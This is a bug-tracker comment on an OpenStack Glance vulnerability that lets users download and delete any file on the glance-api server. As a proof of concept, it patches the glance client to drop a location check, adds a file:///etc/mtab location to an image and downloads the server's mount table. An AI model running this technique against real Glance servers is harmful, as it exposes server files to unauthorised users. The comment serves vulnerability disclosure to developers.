openstack-ansible

  1. Series icehouse
  2. Bug #1400966
  3. Comment #6

Comment 6 for bug 1400966

Revision history for this message
Stuart McLaren (stuart-mclaren) wrote : Re: Glance allows users to download and delete any file in glance-api server

This can be exploited even when the server is configured with "show_multiple_locations = False".

(This is more serious because that is the default setting. )

2014-12-10 17:35:45.137 10953 DEBUG glance.common.config [-] show_multiple_locations = False log_opt_values /mnt/ubuntu/git/glance-juno-stable/glance/.tox/py27/local/lib/python2.7/site-packages/oslo/config/cfg.py:1992

Just patch the client (or send the equivalent request directly with curl):

$ git diff
diff --git a/glanceclient/v2/images.py b/glanceclient/v2/images.py
index 6ec9250..5037553 100644
--- a/glanceclient/v2/images.py
+++ b/glanceclient/v2/images.py
@@ -217,12 +217,10 @@ class Controller(object):
         :param metadata: Metadata associated with the location.
         :returns: The updated image
         """
- image = self._get_image_with_locations_or_fail(image_id)
- url_list = [l['url'] for l in image.locations]
- if url in url_list:
- err_str = 'A location entry at %s already exists' % url
- raise exc.HTTPConflict(err_str)
-
+ #image = self._get_image_with_locations_or_fail(image_id)
+ #url_list = [l['url'] for l in image.locations]
+ #if url in url_list:
+ # err_str = 'A location entry at %s already exists' % url
         add_patch = [{'op': 'add', 'path': '/locations/-',
                       'value': {'url': url, 'metadata': metadata}}]
         self._send_image_update_request(image_id, add_patch)

$ glance image-create --disk-format raw --container-format bare
+------------------+--------------------------------------+
| Property | Value |
 +------------------+--------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2014-12-10T17:36:13 |
| deleted | False |
| deleted_at | None |
| disk_format | raw |
| id | ca95d79e-7d0e-46d7-9561-72dc5540ed98 |
| is_public | False |
| min_disk | 0 |
| min_ram | 0 |
| name | None |
| owner | f68be3a5c2b14721a9e0ed2fcb750481 |
| protected | False |
| size | 0 |
| status | queued |
| updated_at | 2014-12-10T17:36:13 |
| virtual_size | None |
 +------------------+--------------------------------------+

$ glance --os-image-api-version 2 location-add --url file:///etc/mtab ca95d79e-7d0e-46d7-9561-72dc5540ed98
+------------------+------------------------------------------------------+
| Property | Value |
 +------------------+------------------------------------------------------+
| container_format | bare |
| created_at | 2014-12-10T17:36:13Z |
| disk_format | raw |
| file | /v2/images/ca95d79e-7d0e-46d7-9561-72dc5540ed98/file |
| id | ca95d79e-7d0e-46d7-9561-72dc5540ed98 |
| min_disk | 0 |
| min_ram | 0 |
| owner | f68be3a5c2b14721a9e0ed2fcb750481 |
| protected | False |
| schema | /v2/schemas/image |
| size | 1144 |
| status | active |
| tags | [] |
| updated_at | 2014-12-10T17:37:18Z |
| visibility | private |
 +------------------+------------------------------------------------------+

$ glance image-download ca95d79e-7d0e-46d7-9561-72dc5540ed98
/dev/vda1 / ext4 rw 0 0
proc /proc proc rw,noexec,nosuid,nodev 0 0
sysfs /sys sysfs rw,noexec,nosuid,nodev 0 0
none /sys/fs/fuse/connections fusectl rw 0 0
none /sys/kernel/debug debugfs rw 0 0
none /sys/kernel/security securityfs rw 0 0
udev /dev devtmpfs rw,mode=0755 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=0620 0 0
tmpfs /run tmpfs rw,noexec,nosuid,size=10%,mode=0755 0 0